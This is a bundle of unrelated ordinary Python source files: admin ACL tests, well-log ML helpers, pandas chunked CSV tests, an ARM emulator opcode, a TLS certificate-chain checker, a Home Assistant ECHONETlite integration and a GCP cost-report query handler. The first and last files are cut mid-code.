'createNewUser': 1,
'versionManagement': 1,
'listUsers': 1,
'resellerCenter': 1,
'deleteUser': 1,
'changeUserACL': 1,
'createWebsite': 1,
'modifyWebsite': 1,
'suspendWebsite': 1,
'deleteWebsite': 1,
'createPackage': 1,
'listPackages': 1,
'deletePackage': 1,
'modifyPackage': 1,
'createDatabase': 1,
'deleteDatabase': 1,
'listDatabases': 1,
'createNameServer': 1,
'createDNSZone': 1,
'deleteZone': 1,
'addDeleteRecords': 1,
'createEmail': 1,
'listEmails': 1,
'deleteEmail': 1,
'emailForwarding': 1,
'changeEmailPassword': 1,
'dkimManager': 1,
'createFTPAccount': 1,
'deleteFTPAccount': 1,
'listFTPAccounts': 1,
'createBackup': 1,
'restoreBackup': 1,
'addDeleteDestinations': 1,
'scheDuleBackups': 1,
'remoteBackups': 1,
'manageSSL': 1,
'hostnameSSL': 1,
'mailServerSSL': 0}
json_data = json.dumps(data_ret)
## Modification
response = self.client.post(self.submitACLModifications, json_data, content_type="application/json")
logging.writeToFile(response.content)
json_data = json.loads(response.content)
self.assertEqual(json_data['status'], 1)
self.assertEqual(ACL.objects.get(name='hello').mailServerSSL, 0)
self.assertEqual(ACL.objects.get(name='hello').hostnameSSL, 1)
def test_saveChangesAPIAccess(self):
self.test_submitUserCreation()
data_ret = {'accountUsername': 'usman', 'access': 'Enable'}
json_data = json.dumps(data_ret)
## Modification
response = self.client.post(self.saveChangesAPIAccess, json_data, content_type="application/json")
json_data = json.loads(response.content)
self.assertEqual(json_data['status'], 1)
## Check Modification
# response = self.client.post(self.fetchUserDetails, json_data, content_type="application/json")
# logging.writeToFile(response.content)
# json_data = json.loads(response.content)
self.assertEqual(Administrator.objects.get(userName='usman').api, 1)
|
""" Core ML functions"""
import pandas as pd
from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor
from sklearn.multioutput import MultiOutputRegressor
from sklearn.pipeline import Pipeline, make_pipeline
from sklearn.model_selection import LeavePGroupsOut
from sklearn.preprocessing import RobustScaler
from sklearn.cluster import KMeans
def create_facies(df_logs):
""" Adds a facies column from clustering"""
pipe = make_pipeline(RobustScaler(), KMeans(n_clusters=4))
X = df_logs[['GR', 'RHOB', 'NPHI', 'DT']]
cluster_id = pipe.fit_predict(X)
df_logs['facies'] = cluster_id
df_logs['facies'] = 'facies_' + df_logs['facies'].astype(str)
return df_logs
def train_test_split(df_ml):
""" Split log data into train and test by well ID """
test_wells = set(['B03', 'B05', 'B06'])
train_wells = set(df_ml.HACKANAME.unique()) - test_wells
    print('Train wells: ', train_wells)
print('Test wells: ', test_wells)
mask_train = df_ml.HACKANAME.isin(train_wells)
df_ml_train = df_ml[mask_train]
df_ml_test = df_ml[~mask_train]
return df_ml_train, df_ml_test
def make_model(X_train, y_train, quantile=0.5):
""" Returns a trained model """
model = MultiOutputRegressor(GradientBoostingRegressor(loss='quantile', alpha=quantile))
model.fit(X_train, y_train)
return model
def make_multiple_models(df_ml_train, X_cols, y_cols):
""" Returns low, base and high trained models """
X_train = df_ml_train[X_cols]
y_train = df_ml_train[y_cols]
models = []
models.append(['high', make_model(X_train, y_train, quantile=0.90)])
models.append(['base', make_model(X_train, y_train, quantile=0.50)])
models.append(['low', make_model(X_train, y_train, quantile=0.10)])
return models
def make_predictions(models, df_ml, X_cols, y_cols):
    """ Use trained models to make predictions, add on to df_ml as new columns """
    df_pred = df_ml.copy()
X = df_pred[X_cols]
for name, model in models:
y_pred = model.predict(X)
pred_cols = [c + '_pred_'+name for c in y_cols]
df_pred[pred_cols] = pd.DataFrame(y_pred, index=df_pred.index)
return df_pred
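# The sketch below is a minimal, hypothetical usage example of the functions above,
# assuming a 'logs.csv' file whose columns include the 'GR', 'RHOB', 'NPHI', 'DT'
# curves plus the 'HACKANAME' well-ID column; the feature/target split is illustrative.
if __name__ == '__main__':
    df_logs = create_facies(pd.read_csv('logs.csv'))          # hypothetical input file
    df_train, df_test = train_test_split(df_logs)
    X_cols, y_cols = ['GR', 'NPHI'], ['RHOB', 'DT']            # hypothetical feature/target columns
    models = make_multiple_models(df_train, X_cols, y_cols)
    df_pred = make_predictions(models, df_test, X_cols, y_cols)
    print(df_pred.filter(like='_pred_').describe())            # summary of low/base/high predictions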
|
"""
Tests that work on both the Python and C engines but do not have a
specific classification into the other test modules.
"""
from io import StringIO
import numpy as np
import pytest
from pandas.errors import DtypeWarning
from pandas import (
DataFrame,
concat,
)
import pandas._testing as tm
pytestmark = pytest.mark.usefixtures("pyarrow_skip")
@pytest.mark.parametrize("index_col", [0, "index"])
def test_read_chunksize_with_index(all_parsers, index_col):
parser = all_parsers
data = """index,A,B,C,D
foo,2,3,4,5
bar,7,8,9,10
baz,12,13,14,15
qux,12,13,14,15
foo2,12,13,14,15
bar2,12,13,14,15
"""
expected = DataFrame(
[
["foo", 2, 3, 4, 5],
["bar", 7, 8, 9, 10],
["baz", 12, 13, 14, 15],
["qux", 12, 13, 14, 15],
["foo2", 12, 13, 14, 15],
["bar2", 12, 13, 14, 15],
],
columns=["index", "A", "B", "C", "D"],
)
expected = expected.set_index("index")
with parser.read_csv(StringIO(data), index_col=0, chunksize=2) as reader:
chunks = list(reader)
tm.assert_frame_equal(chunks[0], expected[:2])
tm.assert_frame_equal(chunks[1], expected[2:4])
tm.assert_frame_equal(chunks[2], expected[4:])
@pytest.mark.parametrize("chunksize", [1.3, "foo", 0])
def test_read_chunksize_bad(all_parsers, chunksize):
data = """index,A,B,C,D
foo,2,3,4,5
bar,7,8,9,10
baz,12,13,14,15
qux,12,13,14,15
foo2,12,13,14,15
bar2,12,13,14,15
"""
parser = all_parsers
msg = r"'chunksize' must be an integer >=1"
with pytest.raises(ValueError, match=msg):
with parser.read_csv(StringIO(data), chunksize=chunksize) as _:
pass
@pytest.mark.parametrize("chunksize", [2, 8])
def test_read_chunksize_and_nrows(all_parsers, chunksize):
# see gh-15755
data = """index,A,B,C,D
foo,2,3,4,5
bar,7,8,9,10
baz,12,13,14,15
qux,12,13,14,15
foo2,12,13,14,15
bar2,12,13,14,15
"""
parser = all_parsers
kwargs = {"index_col": 0, "nrows": 5}
expected = parser.read_csv(StringIO(data), **kwargs)
with parser.read_csv(StringIO(data), chunksize=chunksize, **kwargs) as reader:
tm.assert_frame_equal(concat(reader), expected)
def test_read_chunksize_and_nrows_changing_size(all_parsers):
data = """index,A,B,C,D
foo,2,3,4,5
bar,7,8,9,10
baz,12,13,14,15
qux,12,13,14,15
foo2,12,13,14,15
bar2,12,13,14,15
"""
parser = all_parsers
kwargs = {"index_col": 0, "nrows": 5}
expected = parser.read_csv(StringIO(data), **kwargs)
with parser.read_csv(StringIO(data), chunksize=8, **kwargs) as reader:
tm.assert_frame_equal(reader.get_chunk(size=2), expected.iloc[:2])
tm.assert_frame_equal(reader.get_chunk(size=4), expected.iloc[2:5])
with pytest.raises(StopIteration, match=""):
reader.get_chunk(size=3)
def test_get_chunk_passed_chunksize(all_parsers):
parser = all_parsers
data = """A,B,C
1,2,3
4,5,6
7,8,9
1,2,3"""
with parser.read_csv(StringIO(data), chunksize=2) as reader:
result = reader.get_chunk()
expected = DataFrame([[1, 2, 3], [4, 5, 6]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [{}, {"index_col": 0}])
def test_read_chunksize_compat(all_parsers, kwargs):
# see gh-12185
data = """index,A,B,C,D
foo,2,3,4,5
bar,7,8,9,10
baz,12,13,14,15
qux,12,13,14,15
foo2,12,13,14,15
bar2,12,13,14,15
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), **kwargs)
with parser.read_csv(StringIO(data), chunksize=2, **kwargs) as reader:
tm.assert_frame_equal(concat(reader), result)
def test_read_chunksize_jagged_names(all_parsers):
# see gh-23509
parser = all_parsers
data = "\n".join(["0"] * 7 + [",".join(["0"] * 10)])
expected = DataFrame([[0] + [np.nan] * 9] * 7 + [[0] * 10])
with parser.read_csv(StringIO(data), names=range(10), chunksize=4) as reader:
result = concat(reader)
tm.assert_frame_equal(result, expected)
def test_chunk_begins_with_newline_whitespace(all_parsers):
# see gh-10022
parser = all_parsers
data = "\n hello\nworld\n"
result = parser.read_csv(StringIO(data), header=None)
expected = DataFrame([" hello", "world"])
tm.assert_frame_equal(result, expected)
@pytest.mark.slow
def test_chunks_have_consistent_numerical_type(all_parsers):
parser = all_parsers
integers = [str(i) for i in range(499999)]
data = "a\n" + "\n".join(integers + ["1.0", "2.0"] + integers)
# Coercions should work without warnings.
with tm.assert_produces_warning(None):
result = parser.read_csv(StringIO(data))
assert type(result.a[0]) is np.float64
assert result.a.dtype == float
def test_warn_if_chunks_have_mismatched_type(all_parsers):
warning_type = None
parser = all_parsers
size = 10000
# see gh-3866: if chunks are different types and can't
# be coerced using numerical types, then issue warning.
if parser.engine == "c" and parser.low_memory:
warning_type = DtypeWarning
# Use larger size to hit warning path
size = 499999
integers = [str(i) for i in range(size)]
data = "a\n" + "\n".join(integers + ["a", "b"] + integers)
buf = StringIO(data)
with tm.assert_produces_warning(warning_type):
df = parser.read_csv(buf)
assert df.a.dtype == object
@pytest.mark.parametrize("iterator", [True, False])
def test_empty_with_nrows_chunksize(all_parsers, iterator):
# see gh-9535
parser = all_parsers
expected = DataFrame(columns=["foo", "bar"])
nrows = 10
data = StringIO("foo,bar\n")
if iterator:
with parser.read_csv(data, chunksize=nrows) as reader:
result = next(iter(reader))
else:
result = parser.read_csv(data, nrows=nrows)
tm.assert_frame_equal(result, expected)
def test_read_csv_memory_growth_chunksize(all_parsers):
# see gh-24805
#
# Let's just make sure that we don't crash
# as we iteratively process all chunks.
parser = all_parsers
with tm.ensure_clean() as path:
with open(path, "w") as f:
for i in range(1000):
f.write(str(i) + "\n")
with parser.read_csv(path, chunksize=20) as result:
for _ in result:
pass
def test_chunksize_with_usecols_second_block_shorter(all_parsers):
# GH#21211
parser = all_parsers
data = """1,2,3,4
5,6,7,8
9,10,11
"""
result_chunks = parser.read_csv(
StringIO(data),
names=["a", "b"],
chunksize=2,
usecols=[0, 1],
header=None,
)
expected_frames = [
DataFrame({"a": [1, 5], "b": [2, 6]}),
DataFrame({"a": [9], "b": [10]}, index=[2]),
]
for i, result in enumerate(result_chunks):
tm.assert_frame_equal(result, expected_frames[i])
def test_chunksize_second_block_shorter(all_parsers):
# GH#21211
parser = all_parsers
data = """a,b,c,d
1,2,3,4
5,6,7,8
9,10,11
"""
result_chunks = parser.read_csv(StringIO(data), chunksize=2)
expected_frames = [
DataFrame({"a": [1, 5], "b": [2, 6], "c": [3, 7], "d": [4, 8]}),
DataFrame({"a": [9], "b": [10], "c": [11], "d": [np.nan]}, index=[2]),
]
for i, result in enumerate(result_chunks):
tm.assert_frame_equal(result, expected_frames[i])
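# Minimal standalone sketch (not tied to the all_parsers fixture): the same chunked
# reading pattern with plain pandas.read_csv; the data and chunk size are illustrative.
def _example_plain_chunksize():
    import pandas as pd

    data = "a,b,c,d\n1,2,3,4\n5,6,7,8\n9,10,11,12\n"
    with pd.read_csv(StringIO(data), chunksize=2) as reader:
        return [chunk.shape for chunk in reader]  # [(2, 4), (1, 4)]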
|
from armulator.armv6.opcodes.abstract_opcodes.sub_register import SubRegister
from armulator.armv6.opcodes.opcode import Opcode
from armulator.armv6.shift import SRType
class SubRegisterT1(SubRegister, Opcode):
def __init__(self, instruction, setflags, m, d, n, shift_t, shift_n):
Opcode.__init__(self, instruction)
SubRegister.__init__(self, setflags, m, d, n, shift_t, shift_n)
def is_pc_changing_opcode(self):
return self.d == 15
@staticmethod
def from_bitarray(instr, processor):
rd = instr[13:16]
rn = instr[10:13]
rm = instr[7:10]
set_flags = not processor.in_it_block()
shift_t = SRType.SRType_LSL
shift_n = 0
return SubRegisterT1(instr, **{"setflags": set_flags, "m": rm.uint, "d": rd.uint, "n": rn.uint,
"shift_t": shift_t, "shift_n": shift_n})
|
import datetime
import select
import socket
import sys
import traceback
import OpenSSL
import json
class Domain(str):
def __new__(cls, domain):
host = domain
port = 443
connection_host = host
result = str.__new__(cls, host)
result.host = host
result.connection_host = connection_host
result.port = port
return result
class CertChecker:
def __init__(self):
pass
def get_cert_from_domain(self, domain):
ctx = OpenSSL.SSL.Context(OpenSSL.SSL.SSLv23_METHOD)
sock = socket.socket()
sock.settimeout(5)
wrapped_sock = OpenSSL.SSL.Connection(ctx, sock)
wrapped_sock.set_tlsext_host_name(domain.host.encode('ascii'))
wrapped_sock.connect((domain.connection_host, 443))
while True:
try:
wrapped_sock.do_handshake()
break
except OpenSSL.SSL.WantReadError:
select.select([wrapped_sock], [], [])
return wrapped_sock.get_peer_cert_chain()
def get_domain_certs(self, domains):
domain = Domain(domains)
try:
data = self.get_cert_from_domain(domain)
except Exception as e:
data = e
return data
def validate_cert(self, cert_chain):
msgs = []
ctx = OpenSSL.SSL.Context(OpenSSL.SSL.SSLv23_METHOD)
ctx.set_default_verify_paths()
cert_store = ctx.get_cert_store()
for index, cert in reversed(list(enumerate(cert_chain))):
sc = OpenSSL.crypto.X509StoreContext(cert_store, cert)
try:
sc.verify_certificate()
except OpenSSL.crypto.X509StoreContextError as e:
msgs.append(
('error', "Validation error '%s'." % e))
if index > 0:
cert_store.add_cert(cert)
return msgs
    def check(self, domain, domain_certs, utcnow):
        msgs = []
        results = []
        earliest_expiration = None
        if domain_certs is None:
            return (msgs, earliest_expiration, None)
        if isinstance(domain_certs, Exception):
            # an exception here means the chain could not be fetched; report it and stop
            msgs.append(('error', "".join(traceback.format_exception_only(type(domain_certs), domain_certs)).strip()))
            return (msgs, earliest_expiration, None)
        msgs = self.validate_cert(domain_certs)
for i, cert in enumerate(domain_certs):
result = {}
subject = cert.get_subject().commonName
result["subject"] = subject
expires = datetime.datetime.strptime(cert.get_notAfter().decode('ascii'), '%Y%m%d%H%M%SZ')
result["expires"] = str(expires)
if expires:
if earliest_expiration is None or expires < earliest_expiration:
earliest_expiration = expires
issued_level = "info"
issuer = cert.get_issuer().commonName
if issuer:
if issuer.lower() == "happy hacker fake ca":
issued_level = "error"
else:
issued_level = 'warning'
msgs.append((issued_level, "Issued by: %s (subject: %s)" % (issuer, subject)))
result["issuer"] = issuer
results.append(result)
if i < len(domain_certs) - 1:
sign_cert = domain_certs[i+1]
subject = sign_cert.get_subject().commonName
if issuer != subject:
msgs.append(
('error', "The certificate sign chain subject '%s' doesn't match the issuer '%s'." % (subject, issuer)))
sig_alg = cert.get_signature_algorithm()
if sig_alg.startswith(b'sha1'):
                msgs.append(('error', "Insecure signature algorithm %s (subject: %s)" % (sig_alg, subject)))
if expires < utcnow:
msgs.append(
('error', "The certificate has expired on %s (subject: %s)" % (expires, subject)))
elif expires < (utcnow + datetime.timedelta(days=15)):
msgs.append(
('warning', "The certificate expires on %s (%s) (subject: %s)" % (
expires, expires - utcnow, subject)))
else:
delta = ((expires - utcnow) // 60 // 10 ** 6) * 60 * 10 ** 6
msgs.append(
('info', "Valid until %s (%s)." % (expires, delta)))
return (msgs, earliest_expiration, results)
def checkCertChain(self, domain):
domain = domain.replace("http://","")
domain = domain.replace("https://","")
domain = domain.split('/')[0]
domain_certs = self.get_domain_certs(domain)
if isinstance(domain_certs, Exception):
            output = {
                "result": "Invalid",
                "errors": ["Unable to obtain certificate chain"],
                "warnings": [],
                "details": []
            }
return output
        utcnow = datetime.datetime.utcnow()
(msgs, earliest_expiration, results) = self.check(domain,domain_certs,utcnow)
warnings = []
output = {}
output["details"] = results
errors = []
for level, msg in msgs:
if level == 'error':
errors.append(msg)
elif level == 'warning':
warnings.append(msg)
output["errors"] = errors
output["warnings"] = warnings
if len(errors) > 0:
output["result"] = "Invalid"
elif len(warnings) > 0:
output["result"] = "Valid (with Warnings)"
else: output["result"] = "Valid"
return output
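# Minimal usage sketch (the host name below is illustrative and assumes outbound
# TLS connections to port 443 are permitted from this machine).
if __name__ == "__main__":
    checker = CertChecker()
    report = checker.checkCertChain("https://example.com/some/path")
    print(json.dumps(report, indent=2))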
|
"""The echonetlite integration."""
from __future__ import annotations
import logging
import pychonet as echonet
from pychonet.lib.epc import EPC_SUPER, EPC_CODE
from pychonet.lib.const import VERSION
from datetime import timedelta
import asyncio
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.util import Throttle
from .const import DOMAIN, USER_OPTIONS, TEMP_OPTIONS
from aioudp import UDPServer
from pychonet import ECHONETAPIClient
from pychonet.EchonetInstance import (
ENL_GETMAP,
ENL_SETMAP,
ENL_UID,
ENL_STATUS,
ENL_INSTANTANEOUS_POWER,
ENL_CUMULATIVE_POWER
)
from pychonet.HomeAirConditioner import (
ENL_FANSPEED,
ENL_AUTO_DIRECTION,
ENL_SWING_MODE,
ENL_AIR_VERT,
ENL_AIR_HORZ,
ENL_HVAC_MODE,
ENL_HVAC_SET_TEMP,
ENL_HVAC_ROOM_HUMIDITY,
ENL_HVAC_ROOM_TEMP,
ENL_HVAC_SILENT_MODE,
ENL_HVAC_OUT_TEMP
)
from pychonet.GeneralLighting import (
ENL_BRIGHTNESS,
ENL_COLOR_TEMP
)
_LOGGER = logging.getLogger(__name__)
PLATFORMS = ["sensor", 'climate', 'select', 'light', 'fan', 'switch']
PARALLEL_UPDATES = 0
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=60)
MAX_UPDATE_BATCH_SIZE = 10
HVAC_API_CONNECTOR_DEFAULT_FLAGS = [
ENL_STATUS, ENL_FANSPEED, ENL_AUTO_DIRECTION, ENL_SWING_MODE, ENL_AIR_VERT, ENL_AIR_HORZ, ENL_HVAC_MODE,
ENL_HVAC_SET_TEMP, ENL_HVAC_ROOM_HUMIDITY, ENL_HVAC_ROOM_TEMP, ENL_HVAC_OUT_TEMP, ENL_HVAC_SILENT_MODE,
ENL_INSTANTANEOUS_POWER, ENL_CUMULATIVE_POWER
]
LIGHT_API_CONNECTOR_DEFAULT_FLAGS = [
ENL_STATUS, ENL_BRIGHTNESS, ENL_COLOR_TEMP
]
# fix later
_0287_API_CONNECTOR_DEFAULT_FLAGS = [ENL_STATUS, 0xC0, 0xC1, 0xC2, 0xC5, 0xC6, 0xC7, 0xC8]
def polling_update_debug_log(values, eojgc, eojcc):
debug_log = f"\nECHONETlite polling update data:\n"
for value in list(values.keys()):
if value in EPC_CODE[eojgc][eojcc]:
debug_log = debug_log + f' - {EPC_CODE[eojgc][eojcc][value]} ({value:#x}): {values[value]}\n'
if value in EPC_SUPER:
debug_log = debug_log + f' - {EPC_SUPER[value]} ({value:#x}): {values[value]}\n'
return debug_log
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
entry.async_on_unload(entry.add_update_listener(update_listener))
host = None
udp = None
loop = None
server = None
if DOMAIN in hass.data: # maybe set up by config entry?
_LOGGER.debug(f"ECHONETlite platform is already started.")
server = hass.data[DOMAIN]['api']
hass.data[DOMAIN].update({entry.entry_id: []})
else: # setup API
_LOGGER.debug(f"Starting up ECHONETlite platform..")
_LOGGER.debug(f"pychonet version is {VERSION}")
hass.data.setdefault(DOMAIN, {})
hass.data[DOMAIN].update({entry.entry_id: []})
udp = UDPServer()
loop = asyncio.get_event_loop()
udp.run("0.0.0.0", 3610, loop=loop)
server = ECHONETAPIClient(server=udp, loop=loop)
server._message_timeout = 300
hass.data[DOMAIN].update({"api": server})
for instance in entry.data["instances"]:
echonetlite = None
host = instance["host"]
eojgc = instance["eojgc"]
eojcc = instance["eojcc"]
eojci = instance["eojci"]
getmap = instance["getmap"]
setmap = instance["setmap"]
uid = instance["uid"]
# manually update API states using config entry data
if host not in list(server._state):
server._state[host] = {
"instances": {
eojgc: {
eojcc: {
eojci: {
ENL_SETMAP: setmap,
ENL_GETMAP: getmap,
ENL_UID: uid
}
}
}
}
}
if eojgc not in list(server._state[host]["instances"]):
server._state[host]["instances"].update({
eojgc: {
eojcc: {
eojci: {
ENL_SETMAP: setmap,
ENL_GETMAP: getmap,
ENL_UID: uid
}
}
}
})
if eojcc not in list(server._state[host]["instances"][eojgc]):
server._state[host]["instances"][eojgc].update({
eojcc: {
eojci: {
ENL_SETMAP: setmap,
ENL_GETMAP: getmap,
ENL_UID: uid
}
}
})
if eojci not in list(server._state[host]["instances"][eojgc][eojcc]):
server._state[host]["instances"][eojgc][eojcc].update({
eojci: {
ENL_SETMAP: setmap,
ENL_GETMAP: getmap,
ENL_UID: uid
}
})
echonetlite = ECHONETConnector(instance, hass.data[DOMAIN]['api'], entry)
await echonetlite.async_update()
hass.data[DOMAIN][entry.entry_id].append({"instance": instance, "echonetlite": echonetlite})
    _LOGGER.debug(f"Platform entry data - {entry.data}")
hass.config_entries.async_setup_platforms(entry, PLATFORMS)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
unload_ok = await hass.config_entries.async_unload_platforms(entry, PLATFORMS)
if unload_ok:
hass.data[DOMAIN].pop(entry.entry_id)
return unload_ok
# TODO update for Air Cleaner
async def update_listener(hass, entry):
for instance in hass.data[DOMAIN][entry.entry_id]:
if instance['instance']['eojgc'] == 1 and instance['instance']['eojcc'] == 48:
for option in USER_OPTIONS.keys():
if entry.options.get(USER_OPTIONS[option]["option"]) is not None: # check if options has been created
if len(entry.options.get(USER_OPTIONS[option]["option"])) > 0: # if it has been created then check list length.
instance["echonetlite"]._user_options.update({option: entry.options.get(USER_OPTIONS[option]["option"])})
else:
instance["echonetlite"]._user_options.update({option: False})
for option in TEMP_OPTIONS.keys():
if entry.options.get(option) is not None:
instance["echonetlite"]._user_options.update({option: entry.options.get(option)})
class ECHONETConnector():
    """ECHONETConnector is used to centralise API calls for ECHONET Lite devices.
    API calls are aggregated per instance (not per node!)"""
def __init__(self, instance, api, entry):
self._host = instance['host']
self._instance = None
self._eojgc = instance['eojgc']
self._eojcc = instance['eojcc']
self._eojci = instance['eojci']
self._update_flag_batches = []
self._update_data = {}
self._api = api
self._getPropertyMap = self._api._state[self._host]["instances"][self._eojgc][self._eojcc][self._eojci][ENL_GETMAP]
self._setPropertyMap = self._api._state[self._host]["instances"][self._eojgc][self._eojcc][self._eojci][ENL_SETMAP]
self._manufacturer = None
if "manufacturer" in instance:
self._manufacturer = instance["manufacturer"]
# Detect HVAC - eventually we will use factory here.
self._update_flags_full_list = []
flags = []
if self._eojgc == 0x01 and self._eojcc == 0x30:
_LOGGER.debug(f"Starting ECHONETLite HomeAirConditioner instance at {self._host}")
flags = HVAC_API_CONNECTOR_DEFAULT_FLAGS
elif self._eojgc == 0x02 and self._eojcc == 0x90:
_LOGGER.debug(f"Starting ECHONETLite GeneralLighting instance at {self._host}")
flags = LIGHT_API_CONNECTOR_DEFAULT_FLAGS
elif self._eojgc == 0x02 and self._eojcc == 0x87:
_LOGGER.debug(f"Starting ECHONETLite DistributionPanelMeter instance at {self._host}")
flags = _0287_API_CONNECTOR_DEFAULT_FLAGS
else:
_LOGGER.debug(f"Starting ECHONETLite Generic instance for {self._eojgc}-{self._eojcc}-{self._eojci} at {self._host}")
flags = [ENL_STATUS]
for item in self._getPropertyMap:
if item not in list(EPC_SUPER.keys()):
if item in list(EPC_CODE[self._eojgc][self._eojcc].keys()):
flags.append(item)
for value in flags:
if value in self._getPropertyMap:
self._update_flags_full_list.append(value)
self._update_data[value] = None
self._instance = echonet.Factory(self._host, self._api, self._eojgc, self._eojcc, self._eojci)
# Split list of codes into batches of 10
start_index = 0
full_list_length = len(self._update_flags_full_list)
while start_index + MAX_UPDATE_BATCH_SIZE < full_list_length:
self._update_flag_batches.append(self._update_flags_full_list[start_index:start_index+MAX_UPDATE_BATCH_SIZE])
start_index += MAX_UPDATE_BATCH_SIZE
self._update_flag_batches.append(self._update_flags_full_list[start_index:full_list_length])
# TODO this looks messy.
self._user_options = {
ENL_FANSPEED: False,
ENL_AUTO_DIRECTION: False,
ENL_SWING_MODE: False,
ENL_AIR_VERT: False,
ENL_AIR_HORZ: False,
'min_temp_heat': 15,
'max_temp_heat': 35,
'min_temp_cool': 15,
'max_temp_cool': 35,
'min_temp_auto': 15,
'max_temp_auto': 35,
}
# User selectable options for fan + swing modes for HVAC
for option in USER_OPTIONS.keys():
if entry.options.get(USER_OPTIONS[option]['option']) is not None: # check if options has been created
if len(entry.options.get(USER_OPTIONS[option]['option'])) > 0: # if it has been created then check list length.
self._user_options[option] = entry.options.get(USER_OPTIONS[option]['option'])
# Temperature range options for heat, cool and auto modes
for option in TEMP_OPTIONS.keys():
if entry.options.get(option) is not None:
self._user_options[option] = entry.options.get(option)
self._uid = self._api._state[self._host]["instances"][self._eojgc][self._eojcc][self._eojci][ENL_UID]
_LOGGER.debug(f'UID for ECHONETLite instance at {self._host} is {self._uid}.')
if self._uid is None:
self._uid = f"{self._host}-{self._eojgc}-{self._eojcc}-{self._eojci}"
@Throttle(MIN_TIME_BETWEEN_UPDATES)
async def async_update(self, **kwargs):
for retry in range(1, 4):
update_data = {}
for flags in self._update_flag_batches:
batch_data = await self._instance.update(flags)
if batch_data is not False:
if isinstance(batch_data, dict):
update_data.update(batch_data)
elif len(flags) == 1:
update_data[flags[0]] = batch_data
_LOGGER.debug(polling_update_debug_log(update_data, self._eojgc, self._eojcc))
# check if polling succeeded
polling_succeeded = False
for value in list(update_data.values()):
if value is not None:
polling_succeeded = True
            if len(update_data) > 0 and polling_succeeded:
                # polling succeeded.
if retry > 1:
_LOGGER.debug(f"Polling ECHONET Instance host at {self._host} succeeded. Retry {retry} of 3")
self._update_data.update(update_data)
return self._update_data
else:
_LOGGER.debug(f"Polling ECHONET Instance host {self._host} timed out. Retry {retry} of 3")
                _LOGGER.debug(f"Number of missed ECHONETLite messages since reboot is {len(self._api._message_list)}")
self._update_data.update(update_data)
return self._update_data
|
#
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""GCP Query Handling for Reports."""
import copy
import logging
from django.db.models import F
from django.db.models import Value
from django.db.models.functions import Coalesce
from django.db.models.functions import Concat
from tenant_schemas.utils import tenant_context
from api.models import Provider
from api.report.gcp.provider_map import GCPProviderMap
from api.report.queries import ReportQueryHandler
LOG = logging.getLogger(__name__)
class GCPReportQueryHandler(ReportQueryHandler):
"""Handles report queries and responses for GCP."""
provider = Provider.PROVIDER_GCP
network_services = {
"Network",
"VPC",
"Firewall",
"Route",
"IP",
"DNS",
"CDN",
"NAT",
"Traffic Director",
"Service Discovery",
"Cloud Domains",
"Private Service Connect",
"Cloud Armor",
}
database_services = {"SQL", "Spanner", "Bigtable", "Firestore", "Firebase", "Memorystore", "MongoDB"}
def __init__(self, parameters):
"""Establish GCP report query handler.
Args:
parameters (QueryParameters): parameter object for query
"""
        # do not override mapper if it's already set
try:
getattr(self, "_mapper")
except AttributeError:
self._mapper = GCPProviderMap(provider=self.provider, report_type=parameters.report_type)
self.group_by_options = self._mapper.provider_map.get("group_by_options")
self._limit = parameters.get_filter("limit")
self.is_csv_output = parameters.accept_type and "text/csv" in parameters.accept_type
# TODO: COST-1986
self.group_by_alias = {"service": "service_alias", "project": "project_name", "gcp_project": "project_name"}
# We need to overwrite the pack keys here to include the credit
# dictionary in the endpoint returns.
gcp_pack_keys = {
"infra_raw": {"key": "raw", "group": "infrastructure"},
"infra_markup": {"key": "markup", "group": "infrastructure"},
"infra_usage": {"key": "usage", "group": "infrastructure"},
"infra_credit": {"key": "credit", "group": "infrastructure"},
"infra_total": {"key": "total", "group": "infrastructure"},
"sup_raw": {"key": "raw", "group": "supplementary"},
"sup_markup": {"key": "markup", "group": "supplementary"},
"sup_usage": {"key": "usage", "group": "supplementary"},
"sup_credit": {"key": "credit", "group": "supplementary"},
"sup_total": {"key": "total", "group": "supplementary"},
"cost_raw": {"key": "raw", "group": "cost"},
"cost_markup": {"key": "markup", "group": "cost"},
"cost_usage": {"key": "usage", "group": "cost"},
"cost_credit": {"key": "credit", "group": "cost"},
"cost_total": {"key": "total", "group": "cost"},
}
gcp_pack_definitions = copy.deepcopy(self._mapper.PACK_DEFINITIONS)
gcp_pack_definitions["cost_groups"]["keys"] = gcp_pack_keys
# super() needs to be called after _mapper and _limit is set
super().__init__(parameters)
self._mapper.PACK_DEFINITIONS = gcp_pack_definitions
@property
def annotations(self):
"""Create dictionary for query annotations.
Returns:
(Dict): query annotations dictionary
"""
units_fallback = self._mapper.report_type_map.get("cost_units_fallback")
annotations = {
"date": self.date_trunc("usage_start"),
"cost_units": Coalesce(self._mapper.cost_units_key, Value(units_fallback)),
}
if self._mapper.usage_units_key:
units_fallback = self._mapper.report_type_map.get("usage_units_fallback")
annotations["usage_units"] = Coalesce(self._mapper.usage_units_key, Value(units_fallback))
fields = self._mapper.provider_map.get("annotations")
for q_param, db_field in fields.items():
annotations[q_param] = Concat(db_field, Value(""))
group_by_fields = self._mapper.provider_map.get("group_by_annotations")
for group_key in self._get_group_by():
if group_by_fields.get(group_key):
for q_param, db_field in group_by_fields[group_key].items():
annotations[q_param] = Concat(db_field, Value(""))
return annotations
def _format_query_response(self):
"""Format the query response with data.
Returns:
(Dict): Dictionary response of query params, data, and total
"""
output = self._initialize_response_output(self.parameters)
output["data"] = self.query_data
output["total"] = self.query_sum
if self._delta:
output["delta"] = self.query_delta
return output
def _build_sum(self, query):
"""Build the sum results for the query."""
sum_units = {}
query_sum = self.initialize_totals()
cost_units_fallback = self._mapper.report_type_map.get("cost_units_fallback")
usage_units_fallback = self._mapper.report_type_map.get("usage_units_fallback")
if query.exists():
sum_annotations = {"cost_units": Coalesce(self._mapper.cost_units_key, Value(cost_units_fallback))}
if self._mapper.usage_units_key:
units_fallback = self._mapper.report_type_map.get("usage_units_fallback")
sum_annotations["usage_units"] = Coalesce(self._mapper.usage_units_key, Value(units_fallback))
sum_query = query.annotate(**sum_annotations).order_by()
